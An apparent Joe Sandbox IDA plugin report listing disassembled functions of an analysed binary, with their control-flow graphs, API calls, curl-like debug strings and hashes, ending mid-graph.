                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: 45b9fd6bcde02e0456d1a20ffafaf87da793173137f2b49782ec54efb78b44a8
                                  • Instruction ID: 0be5f9976df908533123e5daf6e9f6d1818bb2a6268b75d843fd9a2183f43f62
                                  • Opcode Fuzzy Hash: 45b9fd6bcde02e0456d1a20ffafaf87da793173137f2b49782ec54efb78b44a8
                                  • Instruction Fuzzy Hash: D0B1C270A04306AFDB10CF35CD85BE67BA8AF84364F04892DE8594B2D2DB71EC46DB61
                                  Function 00F82F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1457 f82f17-f82f8c call 14098f0 call 1409ce0 1462 f831c9-f831cd 1457->1462 1463 f82f91-f82ff4 call f81619 RegOpenKeyExA 1462->1463 1464 f831d3-f831d6 1462->1464 1467 f82ffa-f8300b 1463->1467 1468 f831c5 1463->1468 1469 f8315c-f831ac RegEnumKeyExA 1467->1469 1468->1462 1470 f83010-f83083 call f81619 RegOpenKeyExA 1469->1470 1471 f831b2-f831c2 RegCloseKey 1469->1471 1474 f83089-f830d4 RegQueryValueExA 1470->1474 1475 f8314e-f83152 1470->1475 1471->1468 1476 f8313b-f8314b RegCloseKey 1474->1476 1477 f830d6-f83137 call 1409bc0 call 1409c50 call 1409ce0 call 1409af0 call 1409ce0 call 1408050 1474->1477 1475->1469 1476->1475 1477->1476
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: d
                                  • API String ID: 1332880857-2564639436
                                  • Opcode ID: b401a41cd2624cdcba0f04c6029da2be9216d76b58664e573de426e2a37e6985
                                  • Instruction ID: 5e3df96ec7630c129f07d076f96f16dafa16cfc213c25dbf4a57dbe5f3ae15e7
                                  • Opcode Fuzzy Hash: b401a41cd2624cdcba0f04c6029da2be9216d76b58664e573de426e2a37e6985
                                  • Instruction Fuzzy Hash: 1971A6B490431A9FDB10EF69C98479EBBF0BF94308F10886DE99897351D7749A88CF52
                                  Function 00FB9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1490 fb9290-fb92ed call f876a0 1493 fb93c3-fb93ce 1490->1493 1494 fb92f3-fb92fb 1490->1494 1503 fb93d0-fb93e1 1493->1503 1504 fb93e5-fb9427 call f9d090 call fc4f40 1493->1504 1495 fb93aa-fb93af 1494->1495 1496 fb9301-fb9333 call f9d8c0 call f9d9a0 1494->1496 1497 fb9456-fb9470 1495->1497 1498 fb93b5-fb93bc 1495->1498 1515 fb93a7 1496->1515 1516 fb9335-fb9364 WSAIoctl 1496->1516 1501 fb9429-fb9431 1498->1501 1502 fb93be 1498->1502 1509 fb9439-fb943f 1501->1509 1510 fb9433-fb9437 1501->1510 1502->1497 1503->1498 1506 fb93e3 1503->1506 1504->1497 1504->1501 1506->1497 1509->1497 1511 fb9441-fb9453 call fc50a0 1509->1511 1510->1497 1510->1509 1511->1497 1515->1495 1519 fb939b-fb93a4 1516->1519 1520 fb9366-fb936f 1516->1520 1519->1515 1520->1519 1522 fb9371-fb9390 setsockopt 1520->1522 1522->1519 1523 fb9392-fb9395 1522->1523 1523->1519
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FB935C
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FB9388
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: 3ab0fe3afc9feca5a5ae6fd5d085ba99fbb34db6205d6d71578d3ef93ab9293a
                                  • Instruction ID: f8e8a2331f6132554e78355b1ef63e36179e173fbffd7d22c6b073c52ccfbe16
                                  • Opcode Fuzzy Hash: 3ab0fe3afc9feca5a5ae6fd5d085ba99fbb34db6205d6d71578d3ef93ab9293a
                                  • Instruction Fuzzy Hash: 01510370A08305ABE710DF25CC81FAAB7A5FF84324F18852CFE488B292E770E951DB51
                                  Function 00F876A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1524 f876a0-f876be 1525 f876c0-f876c7 1524->1525 1526 f876e6-f876f2 send 1524->1526 1525->1526 1527 f876c9-f876d1 1525->1527 1528 f8775e-f87762 1526->1528 1529 f876f4-f87709 call f872a0 1526->1529 1530 f8770b-f87759 call f872a0 call f8cb20 call 1308c50 1527->1530 1531 f876d3-f876e4 1527->1531 1529->1528 1530->1528 1531->1529
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,00F83D4E,00000000,?,?,00F907BF), ref: 00F876EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-3388739168
                                  • Opcode ID: a0ce35dc7ff02d0bf523552b03f4153a73636e01a134d0c307d27dd93ad450a0
                                  • Instruction ID: 0f1e64cd6bebe4a78e27d561b67bcfeba86058bcfc7ab65d01551f447b61f27f
                                  • Opcode Fuzzy Hash: a0ce35dc7ff02d0bf523552b03f4153a73636e01a134d0c307d27dd93ad450a0
                                  • Instruction Fuzzy Hash: 431104B2A093047BD321BB199C4AE6B7B5CDBC2B68F24050CF80967352E261DC04D7B1
                                  Function 00F87770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1643 f87770-f8778e 1644 f87790-f87797 1643->1644 1645 f877b6-f877c2 recv 1643->1645 1644->1645 1646 f87799-f877a1 1644->1646 1647 f8782e-f87832 1645->1647 1648 f877c4-f877d9 call f872a0 1645->1648 1649 f877db-f87829 call f872a0 call f8cb20 call 1308c50 1646->1649 1650 f877a3-f877b4 1646->1650 1648->1647 1649->1647 1650->1648
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: f6a4b20dcf9019102df4359e99bd582d0ea4a198f9cb6c5d1024f39b24ac0f3e
                                  • Instruction ID: 5ab770b38675b7e55ce6ba83fcab511a829c3d8a79cce5727b16b51c917190a8
                                  • Opcode Fuzzy Hash: f6a4b20dcf9019102df4359e99bd582d0ea4a198f9cb6c5d1024f39b24ac0f3e
                                  • Instruction Fuzzy Hash: 3B11E2B6A093443BD320BA159C4AF6B7B5CEBC6F68F24051DB90852351D261DC04C7B1
                                  Function 00F875E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1662 f875e0-f875ed 1663 f875ef-f875f6 1662->1663 1664 f87607-f87629 socket 1662->1664 1663->1664 1665 f875f8-f875ff 1663->1665 1666 f8762b-f8763c call f872a0 1664->1666 1667 f8763f-f87642 1664->1667 1668 f87601-f87602 1665->1668 1669 f87643-f87699 call f872a0 call f8cb20 call 1308c50 1665->1669 1666->1667 1668->1664
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: 2e26b41f1ad6169a0788207fa846c5e9d5058157df59b07e893693b7458f54dd
                                  • Instruction ID: c89cd3cdb35c9472207b1958a0ff7e55b4594aaf18406fbd1a68c637aebdb213
                                  • Opcode Fuzzy Hash: 2e26b41f1ad6169a0788207fa846c5e9d5058157df59b07e893693b7458f54dd
                                  • Instruction Fuzzy Hash: 4C114C76A0571137EB217A6E6C06FCB3B98EFC1B74F14151DF914923A2D261C864D3E1
                                  Function 01308E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1771 1308e90-1308eb8 _open 1772 1308eba-1308ec7 1771->1772 1773 1308eff-1308f2c call 1309f70 1771->1773 1775 1308ef3-1308efa call 1308d20 1772->1775 1776 1308ec9 1772->1776 1781 1308f39-1308f51 call 1308ca8 1773->1781 1775->1773 1778 1308ee2-1308ef1 1776->1778 1779 1308ecb-1308ecd 1776->1779 1778->1775 1778->1776 1782 1411670-1411687 1779->1782 1783 1308ed3-1308ed6 1779->1783 1789 1308f30-1308f37 1781->1789 1790 1308f53-1308f5e call 1308cc0 1781->1790 1785 1411689 1782->1785 1786 141168a-14116b1 1782->1786 1783->1778 1787 1308ed8 1783->1787 1791 14116b9-14116bf 1786->1791 1787->1778 1789->1781 1789->1790 1790->1772 1793 14116c1-14116cf 1791->1793 1794 14116d9-14116fb 1791->1794 1796 14116d5-14116d8 1793->1796 1798 1411706-141171b 1794->1798 1799 14116fd-1411704 1794->1799 1798->1793 1799->1798 1800 141171d-1411732 1799->1800 1800->1796
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@
                                  • API String ID: 4183159743-3016906910
                                  • Opcode ID: 9f74c103e2e376f4b0cd8857669d16aec35cb853f52c1c7de45b537ea915d9e2
                                  • Instruction ID: beaf115f8529ccd93085c3bb0c8028642e9ed6127efdbb6e7c3def9ec2b1bc3d
                                  • Opcode Fuzzy Hash: 9f74c103e2e376f4b0cd8857669d16aec35cb853f52c1c7de45b537ea915d9e2
                                  • Instruction Fuzzy Hash: 3F4177B09083058FDB11EF79D84466FBBE4AF88358F008A2DE9A8D7394E334C805CB56
                                  Function 00FBA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1803 fba150-fba159 1804 fba15f-fba17b 1803->1804 1805 fba250 1803->1805 1806 fba249-fba24f 1804->1806 1807 fba181-fba1ce getsockname 1804->1807 1806->1805 1808 fba1d0-fba1f5 call f9d090 1807->1808 1809 fba1f7-fba214 call fbef30 1807->1809 1816 fba240-fba246 call fc4f40 1808->1816 1809->1806 1814 fba216-fba23b call f9d090 1809->1814 1814->1816 1816->1806
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 00FBA1C6
                                  Strings
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FBA23B
                                  • getsockname() failed with errno %d: %s, xrefs: 00FBA1F0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 7e4782750cc2ad245fed0d91f31ce67f3d973b9bd31db8a1f40d8716c6b48d2b
                                  • Instruction ID: 20bbaca1cea0c298f8e107912207ae4187690f499c1fd85a9192076f50a1fea4
                                  • Opcode Fuzzy Hash: 7e4782750cc2ad245fed0d91f31ce67f3d973b9bd31db8a1f40d8716c6b48d2b
                                  • Instruction Fuzzy Hash: D721DB31C08680B6F7259B69DC47FE673BCEF91338F040654FA9853151FA3269858BE2
                                  Function 00F9D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1823 f9d5e0-f9d5ee 1824 f9d5f0-f9d604 call f9d690 1823->1824 1825 f9d652-f9d662 WSAStartup 1823->1825 1831 f9d61b-f9d651 call fa7620 1824->1831 1832 f9d606-f9d614 1824->1832 1826 f9d670-f9d676 1825->1826 1827 f9d664-f9d66f 1825->1827 1826->1824 1829 f9d67c-f9d68d 1826->1829 1832->1831 1837 f9d616 1832->1837 1837->1831
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 00F9D65B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: ed34ef51604012d2267b1a704f2a19042e396acb617bd1ca1498b46270aebf19
                                  • Instruction ID: a95b58570f9e1e6db3c3bf37c841932998f51b9c45472addf6358d208e7c9aea
                                  • Opcode Fuzzy Hash: ed34ef51604012d2267b1a704f2a19042e396acb617bd1ca1498b46270aebf19
                                  • Instruction Fuzzy Hash: A7017690D4038146FF62BB3CAD1B33635906B92314F892868D898862C6FA2DC498D392
                                  Function 0104AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1839 104aa30-104aa64 1841 104ab04-104ab09 1839->1841 1842 104aa6a-104aaa7 call 103e730 1839->1842 1843 104ae80-104ae89 1841->1843 1846 104ab0e-104ab13 1842->1846 1847 104aaa9-104aabd 1842->1847 1848 104ae2e 1846->1848 1849 104aabf-104aac7 1847->1849 1850 104ab18-104ab50 1847->1850 1851 104ae30-104ae4a call 103ea60 call 103ebf0 1848->1851 1849->1848 1852 104aacd-104ab02 1849->1852 1855 104ab58-104ab6d 1850->1855 1864 104ae75-104ae7d 1851->1864 1865 104ae4c-104ae57 1851->1865 1852->1855 1858 104ab96-104abab socket 1855->1858 1859 104ab6f-104ab73 1855->1859 1858->1848 1863 104abb1-104abc5 1858->1863 1859->1858 1861 104ab75-104ab8f 1859->1861 1861->1863 1877 104ab91 1861->1877 1866 104abc7-104abca 1863->1866 1867 104abd0-104abed ioctlsocket 1863->1867 1864->1843 1869 104ae6e-104ae6f 1865->1869 1870 104ae59-104ae5e 1865->1870 1866->1867 1871 104ad2e-104ad39 1866->1871 1872 104ac10-104ac14 1867->1872 1873 104abef-104ac0a 1867->1873 1869->1864 1870->1869 1880 104ae60-104ae6c 1870->1880 1878 104ad52-104ad56 1871->1878 1879 104ad3b-104ad4c 1871->1879 1874 104ac16-104ac31 1872->1874 1875 104ac37-104ac41 1872->1875 1873->1872 1885 104ae29 1873->1885 1874->1875 1874->1885 1882 104ac43-104ac46 1875->1882 1883 104ac7a-104ac7e 